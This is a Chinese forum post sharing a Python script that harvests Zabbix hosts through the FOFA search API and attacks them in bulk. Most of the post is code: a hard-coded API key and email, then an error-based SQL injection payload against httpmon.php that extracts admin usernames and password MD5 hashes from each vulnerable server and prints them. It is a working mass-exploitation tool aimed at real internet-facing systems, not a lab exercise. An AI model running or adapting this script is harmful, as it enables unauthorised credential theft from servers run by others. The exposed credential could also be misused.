看到有小伙伴问fofa搜索结果采集的问题
http://zone.wooyun.org/content/17971
贴上之前写过的一个简单的采集加利用,代码效率特别低,就抛砖引玉一下!
fofa在不登录状态下默认只展示一部分搜索结果,可以利用它提供的api接口来获取所有的搜索结果。用户名+对应key的形式。
代码是搜索 title=zabbix,并对获取的结果进行zabbix注入漏洞的利用,最终打印出存在漏洞的URL和密码md5.
#coding:utf-8 import urllib2,urllib,cookielib import re,sys import base64 import os,json def vulwebsearch(keywords): vulhostlist=[] urlenkeywords=urllib2.quote(keywords) searchurl="http://fofa.so/api/result?qbase64="+base64.b64encode(keywords)+"&key=d69f306296e8ca95fded42970400ad23&email=her0m@qq.com" req=urllib2.urlopen(searchurl) restring=req.read() restring=json.loads(restring) zabbixsqli(restring['results']) def zabbixsqli(vulhostlist): for vulhost in vulhostlist: if not vulhost.startswith('http'): vulhost="http://"+vulhost zabbix_url=vulhost try: payload="""/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29""" content=urllib.urlopen(zabbix_url) if content.getcode()==200: fzadminmd5_url=zabbix_url+payload req=urllib2.urlopen(fzadminmd5_url) html=req.read() adminmd5=re.findall("\~.*\~\~",html) if len(adminmd5)==1: print zabbix_url,adminmd5 #zabbixweakpass(zabbix_url) except: pass if __name__=="__main__": if len(sys.argv)!=2: print "Usage:"+"python"+" fofa_zabbix.py "+"keywords" print "example:"+"python fofa_zabbix.py title=zabbix" sys.exit() else: vulwebsearch(sys.argv[1]) |
如图:
